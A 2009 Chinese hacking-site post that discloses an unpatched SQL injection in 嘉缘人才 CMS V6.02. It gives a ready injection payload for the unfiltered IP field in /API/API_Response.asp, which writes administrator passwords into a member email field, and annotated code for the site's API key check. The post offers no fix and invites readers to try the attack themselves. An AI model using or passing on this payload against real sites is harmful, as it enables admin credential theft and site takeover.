频道栏目
首页 > 安全 > 网站安全 > 正文

嘉缘人才cms系统最后一个注射漏洞?(0day)

2009-08-03 08:25:37           
收藏   我要投稿

漏洞作者:幻泉[B.S.N]
漏洞来源: http://www.hacker.com.cn
源码下载: 自己动手丰衣足食。
程序版本:嘉缘人才CMS系统V6.02(本人只测试了6.02,老版本大家自己测试吧。)
漏洞等级:高
漏洞说明:
/API/API_Response.asp

由于对ip没做过滤进行update操作导致出现注射漏洞。
如果access限制比较多。但是可以利用一下代码测试。

Code:
,Member_email=dFirst(JOB_pass,JOB_admin),Member_url=aaa

这样就更新密码到email里了。

分析这个漏洞还需要对以下代码分析。

Code:
Function CheckSysKey(iName, iSysKey) username=huanquan   syskey
    If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then 如果都是空则结束调用
        CheckSysKey = False
        Exit Function
    End If
    If Len(iSysKey) = 32 Then 如果syskey长度是32则获取9-16位
        iSysKey = Mid(iSysKey, 9, 16)
    End If
    Dim strFRKey, strFRKeyNew
    strFRKey = Md5(iName&API_SysKey,16)   baf588a6ba715854
    strFRKeyNew = Md5(iName&API_SysKey,16) baf588a6ba715854
    If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
        CheckSysKey = True
    Else
        CheckSysKey = False
    End If


我只介绍大概,漏洞利用代码都给了,大家可以自己看他的程序。

相关TAG标签 漏洞 人才 系统
上一篇:带有mail功能的Webshell
下一篇:CSRF跨站请求伪造攻击详细资料
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站